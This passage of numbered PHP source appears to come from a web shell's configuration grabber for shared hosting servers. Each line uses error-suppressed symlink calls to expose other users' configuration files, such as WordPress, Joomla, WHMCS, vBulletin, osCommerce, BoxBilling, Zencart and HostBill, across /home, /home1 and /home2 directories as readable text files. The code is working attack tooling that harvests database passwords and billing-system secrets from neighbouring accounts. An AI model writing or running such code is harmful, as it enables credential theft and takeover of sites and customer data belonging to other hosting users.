  4402. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  4403. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  4404. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  4405. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  4406. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  4407. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  4408. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  4409. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  4410. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  4411. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  4412. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  4413. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  4414. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  4415. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  4416. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  4417. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  4418. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  4419. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  4420. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  4421. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  4422. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  4423. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  4424. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  4425. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  4426. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  4427. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  4428. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  4429. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  4430. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  4431. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  4432. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  4433. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  4434. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  4435. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  4436. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  4437. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  4438. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  4439. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  4440. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  4441. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  4442. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  4443. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  4444. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  4445. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  4446. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  4447. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  4448. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  4449. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  4450. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  4451. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  4452. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  4453. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  4454. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  4455. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  4456. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  4457. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  4458. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  4459. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  4460. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  4461. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  4462. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  4463. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  4464. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  4465. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  4466. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  4467. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  4468. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  4469. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  4470. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  4471. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  4472. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  4473. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  4474. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  4475. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  4476. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  4477. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  4478. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  4479. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  4480. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  4481. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  4482. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  4483. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  4484. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  4485. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  4486. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  4487. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  4488. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  4489. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  4490. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  4491. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  4492. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  4493. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  4494. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  4495. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  4496.  
  4497. //Home1
  4498.  
  4499. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  4500. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  4501. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  4502. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  4503. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  4504. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  4505. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  4506. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  4507. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  4508. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  4509. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  4510. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  4511. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  4512. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  4513. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  4514. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  4515. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  4516. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  4517. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  4518. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  4519. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  4520. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  4521. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  4522. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  4523. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  4524. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  4525. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  4526. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  4527. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  4528. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  4529. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  4530. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  4531. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  4532. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  4533. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  4534. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  4535. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  4536. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  4537. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  4538. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  4539. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  4540. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  4541. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  4542. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  4543. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  4544. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  4545. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  4546. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  4547. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  4548. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  4549. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  4550. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  4551. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  4552. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  4553. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  4554. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  4555. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  4556. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  4557. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  4558. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  4559. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  4560. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  4561. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  4562. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  4563. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  4564. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  4565. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  4566. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  4567. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  4568. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  4569. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  4570. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  4571. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  4572. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  4573. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  4574. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  4575. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  4576. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  4577. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  4578. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  4579. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  4580. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  4581. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  4582. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  4583. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  4584. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  4585. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  4586. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  4587. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  4588. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  4589. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  4590. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  4591. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  4592. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  4593. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  4594. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  4595. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  4596. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  4597. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  4598. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  4599. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  4600. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  4601. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  4602. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  4603. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  4604. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  4605. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  4606. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  4607. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  4608. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  4609. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  4610. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  4611. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  4612. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  4613. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  4614. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  4615. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  4616. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  4617. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  4618. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  4619. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  4620. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  4621. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  4622. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  4623. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  4624. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  4625. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  4626. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  4627. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  4628. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  4629. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  4630. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  4631. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  4632. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  4633. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  4634. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  4635. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  4636. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  4637. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  4638. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  4639. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  4640. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  4641. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  4642. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  4643. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  4644. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  4645. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  4646. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  4647. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  4648. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  4649. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  4650. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  4651. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  4652. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  4653. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  4654. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  4655. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  4656. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  4657. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  4658. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  4659. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  4660. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  4661. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  4662. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  4663. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  4664. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  4665. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  4666. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  4667. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  4668. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  4669. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  4670. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  4671. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  4672. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  4673. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  4674. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  4675. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  4676. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  4677. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  4678. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  4679.  
  4680. //Home2
  4681.  
  4682. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  4683. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  4684. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  4685. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  4686. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  4687. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  4688. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  4689. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  4690. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  4691. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  4692. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  4693. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  4694. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  4695. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  4696. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  4697. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  4698. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  4699. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  4700. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  4701. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  4702. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  4703. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  4704. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  4705. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  4706. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  4707. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  4708. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  4709. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  4710. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
